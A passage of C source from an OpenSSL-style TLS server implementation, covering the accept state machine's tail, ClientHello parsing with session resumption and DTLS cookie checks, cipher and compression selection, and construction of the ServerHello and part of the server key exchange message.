if (ret <= 0) goto end;
s->state=SSL3_ST_SW_FINISHED_A;
s->init_num=0;
if (!s->method->ssl3_enc->change_cipher_state(s,
SSL3_CHANGE_CIPHER_SERVER_WRITE))
{
ret= -1;
goto end;
}
break;
case SSL3_ST_SW_FINISHED_A:
case SSL3_ST_SW_FINISHED_B:
ret=ssl3_send_finished(s,
SSL3_ST_SW_FINISHED_A,SSL3_ST_SW_FINISHED_B,
s->method->ssl3_enc->server_finished_label,
s->method->ssl3_enc->server_finished_label_len);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_FLUSH;
if (s->hit)
{
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->s3->tmp.next_state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
{
s->s3->tmp.next_state=SSL3_ST_SR_NEXT_PROTO_A;
}
else
s->s3->tmp.next_state=SSL3_ST_SR_FINISHED_A;
#endif
}
else
s->s3->tmp.next_state=SSL_ST_OK;
s->init_num=0;
break;
case SSL_ST_OK:
/* clean a few things up */
ssl3_cleanup_key_block(s);
BUF_MEM_free(s->init_buf);
s->init_buf=NULL;
/* remove buffering on output */
ssl_free_wbio_buffer(s);
s->init_num=0;
if (s->renegotiate == 2) /* skipped if we just sent a HelloRequest */
{
s->renegotiate=0;
s->new_session=0;
ssl_update_cache(s,SSL_SESS_CACHE_SERVER);
s->ctx->stats.sess_accept_good++;
/* s->server=1; */
s->handshake_func=ssl3_accept;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_DONE,1);
}
ret = 1;
goto end;
/* break; */
default:
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_UNKNOWN_STATE);
ret= -1;
goto end;
/* break; */
}
if (!s->s3->tmp.reuse_message && !skip)
{
if (s->debug)
{
if ((ret=BIO_flush(s->wbio)) <= 0)
goto end;
}
if ((cb != NULL) && (s->state != state))
{
new_state=s->state;
s->state=state;
cb(s,SSL_CB_ACCEPT_LOOP,1);
s->state=new_state;
}
}
skip=0;
}
end:
/* BIO_flush(s->wbio); */
s->in_handshake--;
if (cb != NULL)
cb(s,SSL_CB_ACCEPT_EXIT,ret);
return(ret);
}
int ssl3_send_hello_request(SSL *s)
{
if (s->state == SSL3_ST_SW_HELLO_REQ_A)
{
ssl_set_handshake_header(s, SSL3_MT_HELLO_REQUEST, 0);
s->state=SSL3_ST_SW_HELLO_REQ_B;
}
/* SSL3_ST_SW_HELLO_REQ_B */
return ssl_do_write(s);
}
int ssl3_get_client_hello(SSL *s)
{
int i,j,ok,al=SSL_AD_INTERNAL_ERROR,ret= -1;
unsigned int cookie_len;
long n;
unsigned long id;
unsigned char *p,*d;
SSL_CIPHER *c;
#ifndef OPENSSL_NO_COMP
unsigned char *q;
SSL_COMP *comp=NULL;
#endif
STACK_OF(SSL_CIPHER) *ciphers=NULL;
if (s->state == SSL3_ST_SR_CLNT_HELLO_C && !s->first_packet)
goto retry_cert;
/* We do this so that we will respond with our native type.
* If we are TLSv1 and we get SSLv3, we will respond with TLSv1,
* This down switching should be handled by a different method.
* If we are SSLv3, we will respond with SSLv3, even if prompted with
* TLSv1.
*/
if (s->state == SSL3_ST_SR_CLNT_HELLO_A
)
{
s->state=SSL3_ST_SR_CLNT_HELLO_B;
}
s->first_packet=1;
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CLNT_HELLO_B,
SSL3_ST_SR_CLNT_HELLO_C,
SSL3_MT_CLIENT_HELLO,
SSL3_RT_MAX_PLAIN_LENGTH,
&ok);
if (!ok) return((int)n);
s->first_packet=0;
d=p=(unsigned char *)s->init_msg;
/* use version from inside client hello, not from record header
* (may differ: see RFC 2246, Appendix E, second paragraph) */
s->client_version=(((int)p[0])<<8)|(int)p[1];
p+=2;
if (SSL_IS_DTLS(s) ? (s->client_version > s->version &&
s->method->version != DTLS_ANY_VERSION)
: (s->client_version < s->version))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_WRONG_VERSION_NUMBER);
if ((s->client_version>>8) == SSL3_VERSION_MAJOR &&
!s->enc_write_ctx && !s->write_hash)
{
/* similar to ssl3_get_record, send alert using remote version number */
s->version = s->client_version;
}
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
/* If we require cookies and this ClientHello doesn't
* contain one, just return since we do not want to
* allocate any memory yet. So check cookie length...
*/
if (SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE)
{
unsigned int session_length, cookie_length;
session_length = *(p + SSL3_RANDOM_SIZE);
cookie_length = *(p + SSL3_RANDOM_SIZE + session_length + 1);
if (cookie_length == 0)
return 1;
}
/* load the client random */
memcpy(s->s3->client_random,p,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
/* get the session-id */
j= *(p++);
s->hit=0;
/* Versions before 0.9.7 always allow clients to resume sessions in renegotiation.
* 0.9.7 and later allow this by default, but optionally ignore resumption requests
* with flag SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION (it's a new flag rather
* than a change to default behavior so that applications relying on this for security
* won't even compile against older library versions).
*
* 1.0.1 and later also have a function SSL_renegotiate_abbreviated() to request
* renegotiation but not a new session (s->new_session remains unset): for servers,
* this essentially just means that the SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION
* setting will be ignored.
*/
if ((s->new_session && (s->options & SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION)))
{
if (!ssl_get_new_session(s,1))
goto err;
}
else
{
i=ssl_get_prev_session(s, p, j, d + n);
/*
* Only resume if the session's version matches the negotiated
* version.
* RFC 5246 does not provide much useful advice on resumption
* with a different protocol version. It doesn't forbid it but
* the sanity of such behaviour would be questionable.
* In practice, clients do not accept a version mismatch and
* will abort the handshake with an error.
*/
if (i == 1 && s->version == s->session->ssl_version)
{ /* previous session */
s->hit=1;
}
else if (i == -1)
goto err;
else /* i == 0 */
{
if (!ssl_get_new_session(s,1))
goto err;
}
}
p+=j;
if (SSL_IS_DTLS(s))
{
/* cookie stuff */
cookie_len = *(p++);
/*
* The ClientHello may contain a cookie even if the
* HelloVerify message has not been sent--make sure that it
* does not cause an overflow.
*/
if ( cookie_len > sizeof(s->d1->rcvd_cookie))
{
/* too much data */
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* verify the cookie if appropriate option is set. */
if ((SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE) &&
cookie_len > 0)
{
memcpy(s->d1->rcvd_cookie, p, cookie_len);
if ( s->ctx->app_verify_cookie_cb != NULL)
{
if ( s->ctx->app_verify_cookie_cb(s, s->d1->rcvd_cookie,
cookie_len) == 0)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* else cookie verification succeeded */
}
else if ( memcmp(s->d1->rcvd_cookie, s->d1->cookie,
s->d1->cookie_len) != 0) /* default verification */
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* Set to -2 so if successful we return 2 */
ret = -2;
}
p += cookie_len;
if (s->method->version == DTLS_ANY_VERSION)
{
/* Select version to use */
if (s->client_version <= DTLS1_2_VERSION &&
!(s->options & SSL_OP_NO_DTLSv1_2))
{
s->version = DTLS1_2_VERSION;
s->method = DTLSv1_2_server_method();
}
else if (tls1_suiteb(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
s->version = s->client_version;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
else if (s->client_version <= DTLS1_VERSION &&
!(s->options & SSL_OP_NO_DTLSv1))
{
s->version = DTLS1_VERSION;
s->method = DTLSv1_server_method();
}
else
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_WRONG_VERSION_NUMBER);
s->version = s->client_version;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
s->session->ssl_version = s->version;
}
}
n2s(p,i);
if ((i == 0) && (j != 0))
{
/* we need a cipher if we are not resuming a session */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_CIPHERS_SPECIFIED);
goto f_err;
}
if ((p+i) >= (d+n))
{
/* not enough data */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
if ((i > 0) && (ssl_bytes_to_cipher_list(s,p,i,&(ciphers))
== NULL))
{
goto err;
}
p+=i;
/* If it is a hit, check that the cipher is in the list */
if ((s->hit) && (i > 0))
{
j=0;
id=s->session->cipher->id;
#ifdef CIPHER_DEBUG
fprintf(stderr,"client sent %d ciphers\n",sk_SSL_CIPHER_num(ciphers));
#endif
for (i=0; i<sk_SSL_CIPHER_num(ciphers); i++)
{
c=sk_SSL_CIPHER_value(ciphers,i);
#ifdef CIPHER_DEBUG
fprintf(stderr,"client [%2d of %2d]:%s\n",
i,sk_SSL_CIPHER_num(ciphers),
SSL_CIPHER_get_name(c));
#endif
if (c->id == id)
{
j=1;
break;
}
}
/* Disabled because it can be used in a ciphersuite downgrade
* attack: CVE-2010-4180.
*/
#if 0
if (j == 0 && (s->options & SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG) && (sk_SSL_CIPHER_num(ciphers) == 1))
{
/* Special case as client bug workaround: the previously used cipher may
* not be in the current list, the client instead might be trying to
* continue using a cipher that before wasn't chosen due to server
* preferences. We'll have to reject the connection if the cipher is not
* enabled, though. */
c = sk_SSL_CIPHER_value(ciphers, 0);
if (sk_SSL_CIPHER_find(SSL_get_ciphers(s), c) >= 0)
{
s->session->cipher = c;
j = 1;
}
}
#endif
if (j == 0)
{
/* we need to have the cipher in the cipher
* list if we are asked to reuse it */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_REQUIRED_CIPHER_MISSING);
goto f_err;
}
}
/* compression */
i= *(p++);
if ((p+i) > (d+n))
{
/* not enough data */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
#ifndef OPENSSL_NO_COMP
q=p;
#endif
for (j=0; j<i; j++)
{
if (p[j] == 0) break;
}
p+=i;
if (j >= i)
{
/* no compress */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_COMPRESSION_SPECIFIED);
goto f_err;
}
#ifndef OPENSSL_NO_TLSEXT
/* TLS extensions*/
if (s->version >= SSL3_VERSION)
{
if (!ssl_parse_clienthello_tlsext(s,&p,d,n))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_PARSE_TLSEXT);
goto err;
}
}
/* Check if we want to use external pre-shared secret for this
* handshake for not reused session only. We need to generate
* server_random before calling tls_session_secret_cb in order to allow
* SessionTicket processing to use it in key derivation. */
{
unsigned char *pos;
pos=s->s3->server_random;
if (ssl_fill_hello_random(s, 1, pos, SSL3_RANDOM_SIZE) <= 0)
{
goto f_err;
}
}
if (!s->hit && s->version >= TLS1_VERSION && s->tls_session_secret_cb)
{
SSL_CIPHER *pref_cipher=NULL;
s->session->master_key_length=sizeof(s->session->master_key);
if(s->tls_session_secret_cb(s, s->session->master_key, &s->session->master_key_length,
ciphers, &pref_cipher, s->tls_session_secret_cb_arg))
{
s->hit=1;
s->session->ciphers=ciphers;
s->session->verify_result=X509_V_OK;
ciphers=NULL;
/* check if some cipher was preferred by call back */
pref_cipher=pref_cipher ? pref_cipher : ssl3_choose_cipher(s, s->session->ciphers, SSL_get_ciphers(s));
if (pref_cipher == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_SHARED_CIPHER);
goto f_err;
}
s->session->cipher=pref_cipher;
if (s->cipher_list)
sk_SSL_CIPHER_free(s->cipher_list);
if (s->cipher_list_by_id)
sk_SSL_CIPHER_free(s->cipher_list_by_id);
s->cipher_list = sk_SSL_CIPHER_dup(s->session->ciphers);
s->cipher_list_by_id = sk_SSL_CIPHER_dup(s->session->ciphers);
}
}
#endif
/* Worst case, we will use the NULL compression, but if we have other
* options, we will now look for them. We have i-1 compression
* algorithms from the client, starting at q. */
s->s3->tmp.new_compression=NULL;
#ifndef OPENSSL_NO_COMP
/* This only happens if we have a cache hit */
if (s->session->compress_meth != 0)
{
int m, comp_id = s->session->compress_meth;
/* Perform sanity checks on resumed compression algorithm */
/* Can't disable compression */
if (!ssl_allow_compression(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INCONSISTENT_COMPRESSION);
goto f_err;
}
/* Look for resumed compression method */
for (m = 0; m < sk_SSL_COMP_num(s->ctx->comp_methods); m++)
{
comp=sk_SSL_COMP_value(s->ctx->comp_methods,m);
if (comp_id == comp->id)
{
s->s3->tmp.new_compression=comp;
break;
}
}
if (s->s3->tmp.new_compression == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INVALID_COMPRESSION_ALGORITHM);
goto f_err;
}
/* Look for resumed method in compression list */
for (m = 0; m < i; m++)
{
if (q[m] == comp_id)
break;
}
if (m >= i)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_REQUIRED_COMPRESSSION_ALGORITHM_MISSING);
goto f_err;
}
}
else if (s->hit)
comp = NULL;
else if (ssl_allow_compression(s) && s->ctx->comp_methods)
{ /* See if we have a match */
int m,nn,o,v,done=0;
nn=sk_SSL_COMP_num(s->ctx->comp_methods);
for (m=0; m<nn; m++)
{
comp=sk_SSL_COMP_value(s->ctx->comp_methods,m);
v=comp->id;
for (o=0; o<i; o++)
{
if (v == q[o])
{
done=1;
break;
}
}
if (done) break;
}
if (done)
s->s3->tmp.new_compression=comp;
else
comp=NULL;
}
#else
/* If compression is disabled we'd better not try to resume a session
* using compression.
*/
if (s->session->compress_meth != 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INCONSISTENT_COMPRESSION);
goto f_err;
}
#endif
/* Given s->session->ciphers and SSL_get_ciphers, we must
* pick a cipher */
if (!s->hit)
{
#ifdef OPENSSL_NO_COMP
s->session->compress_meth=0;
#else
s->session->compress_meth=(comp == NULL)?0:comp->id;
#endif
if (s->session->ciphers != NULL)
sk_SSL_CIPHER_free(s->session->ciphers);
s->session->ciphers=ciphers;
if (ciphers == NULL)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_CIPHERS_PASSED);
goto f_err;
}
ciphers=NULL;
if (!tls1_set_server_sigalgs(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
goto err;
}
/* Let cert callback update server certificates if required */
retry_cert:
if (s->cert->cert_cb)
{
int rv = s->cert->cert_cb(s, s->cert->cert_cb_arg);
if (rv == 0)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_CERT_CB_ERROR);
goto f_err;
}
if (rv < 0)
{
s->rwstate=SSL_X509_LOOKUP;
return -1;
}
s->rwstate = SSL_NOTHING;
}
c=ssl3_choose_cipher(s,s->session->ciphers,
SSL_get_ciphers(s));
if (c == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_SHARED_CIPHER);
goto f_err;
}
s->s3->tmp.new_cipher=c;
/* check whether we should disable session resumption */
if (s->not_resumable_session_cb != NULL)
s->session->not_resumable=s->not_resumable_session_cb(s,
((c->algorithm_mkey & (SSL_kDHE | SSL_kECDHE)) != 0));
if (s->session->not_resumable)
/* do not send a session ticket */
s->tlsext_ticket_expected = 0;
}
else
{
/* Session-id reuse */
#ifdef REUSE_CIPHER_BUG
STACK_OF(SSL_CIPHER) *sk;
SSL_CIPHER *nc=NULL;
SSL_CIPHER *ec=NULL;
if (s->options & SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG)
{
sk=s->session->ciphers;
for (i=0; i<sk_SSL_CIPHER_num(sk); i++)
{
c=sk_SSL_CIPHER_value(sk,i);
if (c->algorithm_enc & SSL_eNULL)
nc=c;
if (SSL_C_IS_EXPORT(c))
ec=c;
}
if (nc != NULL)
s->s3->tmp.new_cipher=nc;
else if (ec != NULL)
s->s3->tmp.new_cipher=ec;
else
s->s3->tmp.new_cipher=s->session->cipher;
}
else
#endif
s->s3->tmp.new_cipher=s->session->cipher;
}
if (!SSL_USE_SIGALGS(s) || !(s->verify_mode & SSL_VERIFY_PEER))
{
if (!ssl3_digest_cached_records(s))
goto f_err;
}
/*-
* we now have the following setup.
* client_random
* cipher_list - our prefered list of ciphers
* ciphers - the clients prefered list of ciphers
* compression - basically ignored right now
* ssl version is set - sslv3
* s->session - The ssl session has been setup.
* s->hit - session reuse flag
* s->s3->tmp.new_cipher- the new cipher to use.
*/
/* Handles TLS extensions that we couldn't check earlier */
if (s->version >= SSL3_VERSION)
{
if (ssl_check_clienthello_tlsext_late(s) <= 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
goto err;
}
}
if (ret < 0) ret=-ret;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
err:
if (ciphers != NULL) sk_SSL_CIPHER_free(ciphers);
return ret < 0 ? -1 : ret;
}
int ssl3_send_server_hello(SSL *s)
{
unsigned char *buf;
unsigned char *p,*d;
int i,sl;
int al = 0;
unsigned long l;
if (s->state == SSL3_ST_SW_SRVR_HELLO_A)
{
buf=(unsigned char *)s->init_buf->data;
#ifdef OPENSSL_NO_TLSEXT
p=s->s3->server_random;
if (ssl_fill_hello_random(s, 1, p, SSL3_RANDOM_SIZE) <= 0)
return -1;
#endif
/* Do the message type and length last */
d=p= ssl_handshake_start(s);
*(p++)=s->version>>8;
*(p++)=s->version&0xff;
/* Random stuff */
memcpy(p,s->s3->server_random,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
/*-
* There are several cases for the session ID to send
* back in the server hello:
* - For session reuse from the session cache,
* we send back the old session ID.
* - If stateless session reuse (using a session ticket)
* is successful, we send back the client's "session ID"
* (which doesn't actually identify the session).
* - If it is a new session, we send back the new
* session ID.
* - However, if we want the new session to be single-use,
* we send back a 0-length session ID.
* s->hit is non-zero in either case of session reuse,
* so the following won't overwrite an ID that we're supposed
* to send back.
*/
if (s->session->not_resumable ||
(!(s->ctx->session_cache_mode & SSL_SESS_CACHE_SERVER)
&& !s->hit))
s->session->session_id_length=0;
sl=s->session->session_id_length;
if (sl > (int)sizeof(s->session->session_id))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO, ERR_R_INTERNAL_ERROR);
return -1;
}
*(p++)=sl;
memcpy(p,s->session->session_id,sl);
p+=sl;
/* put the cipher */
i=ssl3_put_cipher_by_char(s->s3->tmp.new_cipher,p);
p+=i;
/* put the compression method */
#ifdef OPENSSL_NO_COMP
*(p++)=0;
#else
if (s->s3->tmp.new_compression == NULL)
*(p++)=0;
else
*(p++)=s->s3->tmp.new_compression->id;
#endif
#ifndef OPENSSL_NO_TLSEXT
if (ssl_prepare_serverhello_tlsext(s) <= 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO,SSL_R_SERVERHELLO_TLSEXT);
return -1;
}
if ((p = ssl_add_serverhello_tlsext(s, p, buf+SSL3_RT_MAX_PLAIN_LENGTH, &al)) == NULL)
{
ssl3_send_alert(s, SSL3_AL_FATAL, al);
SSLerr(SSL_F_SSL3_SEND_SERVER_HELLO,ERR_R_INTERNAL_ERROR);
return -1;
}
#endif
/* do the header */
l=(p-d);
ssl_set_handshake_header(s, SSL3_MT_SERVER_HELLO, l);
s->state=SSL3_ST_SW_SRVR_HELLO_B;
}
/* SSL3_ST_SW_SRVR_HELLO_B */
return ssl_do_write(s);
}
int ssl3_send_server_done(SSL *s)
{
if (s->state == SSL3_ST_SW_SRVR_DONE_A)
{
ssl_set_handshake_header(s, SSL3_MT_SERVER_DONE, 0);
s->state = SSL3_ST_SW_SRVR_DONE_B;
}
/* SSL3_ST_SW_SRVR_DONE_B */
return ssl_do_write(s);
}
int ssl3_send_server_key_exchange(SSL *s)
{
#ifndef OPENSSL_NO_RSA
unsigned char *q;
int j,num;
RSA *rsa;
unsigned char md_buf[MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH];
unsigned int u;
#endif
#ifndef OPENSSL_NO_DH
DH *dh=NULL,*dhp;
#endif
#ifndef OPENSSL_NO_ECDH
EC_KEY *ecdh=NULL, *ecdhp;
unsigned char *encodedPoint = NULL;
int encodedlen = 0;
int curve_id = 0;
BN_CTX *bn_ctx = NULL;
#endif
EVP_PKEY *pkey;
const EVP_MD *md = NULL;
unsigned char *p,*d;
int al,i;
unsigned long type;
int n;
CERT *cert;
BIGNUM *r[4];
int nr[4],kn;
BUF_MEM *buf;
EVP_MD_CTX md_ctx;
EVP_MD_CTX_init(&md_ctx);
if (s->state == SSL3_ST_SW_KEY_EXCH_A)
{
type=s->s3->tmp.new_cipher->algorithm_mkey;
cert=s->cert;
buf=s->init_buf;
r[0]=r[1]=r[2]=r[3]=NULL;
n=0;
#ifndef OPENSSL_NO_RSA
if (type & SSL_kRSA)
{
rsa=cert->rsa_tmp;
if ((rsa == NULL) && (s->cert->rsa_tmp_cb != NULL))
{
rsa=s->cert->rsa_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
if(rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_ERROR_GENERATING_TMP_RSA_KEY);
goto f_err;
}
RSA_up_ref(rsa);
cert->rsa_tmp=rsa;
}
if (rsa == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_RSA_KEY);
goto f_err;
}
r[0]=rsa->n;
r[1]=rsa->e;
s->s3->tmp.use_rsa_tmp=1;
}
else
#endif
#ifndef OPENSSL_NO_DH
if (type & SSL_kDHE)
{
if (s->cert->dh_tmp_auto)
{
dhp = ssl_get_auto_dh(s);
if (dhp == NULL)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto f_err;
}
}
else
dhp=cert->dh_tmp;
if ((dhp == NULL) && (s->cert->dh_tmp_cb != NULL))
dhp=s->cert->dh_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
if (dhp == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_DH_KEY);
goto f_err;
}
if (!ssl_security(s, SSL_SECOP_TMP_DH,
DH_security_bits(dhp), 0, dhp))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_DH_KEY_TOO_SMALL);
goto f_err;
}
if (s->s3->tmp.dh != NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
goto err;
}
if (s->cert->dh_tmp_auto)
dh = dhp;
else if ((dh=DHparams_dup(dhp)) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
s->s3->tmp.dh=dh;
if ((dhp->pub_key == NULL ||
dhp->priv_key == NULL ||
(s->options & SSL_OP_SINGLE_DH_USE)))
{
if(!DH_generate_key(dh))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,
ERR_R_DH_LIB);
goto err;
}
}
else
{
dh->pub_key=BN_dup(dhp->pub_key);
dh->priv_key=BN_dup(dhp->priv_key);
if ((dh->pub_key == NULL) ||
(dh->priv_key == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
}
r[0]=dh->p;
r[1]=dh->g;
r[2]=dh->pub_key;
}
else
#endif
#ifndef OPENSSL_NO_ECDH
if (type & SSL_kECDHE)
{
const EC_GROUP *group;
ecdhp=cert->ecdh_tmp;
if (s->cert->ecdh_tmp_auto)
{
/* Get NID of appropriate shared curve */
int nid = tls1_shared_curve(s, -2);
if (nid != NID_undef)
ecdhp = EC_KEY_new_by_curve_name(nid);
}
else if ((ecdhp == NULL) && s->cert->ecdh_tmp_cb)
{
ecdhp=s->cert->ecdh_tmp_cb(s,
SSL_C_IS_EXPORT(s->s3->tmp.new_cipher),
SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher));
}
if (ecdhp == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_TMP_ECDH_KEY);
goto f_err;
}
if (s->s3->tmp.ecdh != NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
goto err;
}
/* Duplicate the ECDH structure. */
if (ecdhp == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
if (s->cert->ecdh_tmp_auto)
ecdh = ecdhp;
else if ((ecdh = EC_KEY_dup(ecdhp)) == NULL)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
s->s3->tmp.ecdh=ecdh;
if ((EC_KEY_get0_public_key(ecdh) == NULL) ||
(EC_KEY_get0_private_key(ecdh) == NULL) ||
(s->options & SSL_OP_SINGLE_ECDH_USE))
{
if(!EC_KEY_generate_key(ecdh))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
}
if (((group = EC_KEY_get0_group(ecdh)) == NULL) ||
(EC_KEY_get0_public_key(ecdh) == NULL) ||
(EC_KEY_get0_private_key(ecdh) == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) &&
(EC_GROUP_get_degree(group) > 163))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER);
goto err;
}
/* XXX: For now, we only support ephemeral ECDH
* keys over named (not generic) curves. For
* supported named curves, curve_id is non-zero.
*/
if ((curve_id =
tls1_ec_nid2curve_id(EC_GROUP_get_curve_name(group)))
== 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_UNSUPPORTED_ELLIPTIC_CURVE);
goto err;
}
/* Encode the public key.
* First check the size of encoding and
* allocate memory accordingly.
*/
encodedlen = EC_POINT_point2oct(group,
EC_KEY_get0_public_key(ecdh),
POINT_CONVERSION_UNCOMPRESSED,
NULL, 0, NULL);
encodedPoint = (unsigned char *)
OPENSSL_malloc(encodedlen*sizeof(unsigned char));
bn_ctx = BN_CTX_new();
if ((encodedPoint == NULL) || (bn_ctx == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
encodedlen = EC_POINT_point2oct(group,
EC_KEY_get0_public_key(ecdh),
POINT_CONVERSION_UNCOMPRESSED,
encodedPoint, encodedlen, bn_ctx);
if (encodedlen == 0)
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,ERR_R_ECDH_LIB);
goto err;
}
BN_CTX_free(bn_ctx); bn_ctx=NULL;
/* XXX: For now, we only support named (not
* generic) curves in ECDH ephemeral key exchanges.
* In this situation, we need four additional bytes
* to encode the entire ServerECDHParams
* structure.
*/
n = 4 + encodedlen;
/* We'll generate the serverKeyExchange message
* explicitly so we can set these to NULLs
*/
r[0]=NULL;
r[1]=NULL;
r[2]=NULL;
r[3]=NULL;
}
else
#endif /* !OPENSSL_NO_ECDH */
#ifndef OPENSSL_NO_PSK
if (type & SSL_kPSK)
{
/* reserve size for record length and PSK identity hint*/
n+=2+strlen(s->ctx->psk_identity_hint);
}
else
#endif /* !OPENSSL_NO_PSK */
#ifndef OPENSSL_NO_SRP
if (type & SSL_kSRP)
{
if ((s->srp_ctx.N == NULL) ||
(s->srp_ctx.g == NULL) ||
(s->srp_ctx.s == NULL) ||
(s->srp_ctx.B == NULL))
{
SSLerr(SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE,SSL_R_MISSING_SRP_PARAM);
goto err;
}
r[0]=s->srp_ctx.N;
r[1]=s->srp_ctx.g;
r[2]=s->srp_ctx.s;
r[3]=s->srp_ctx.B;
}
else
#endif
{
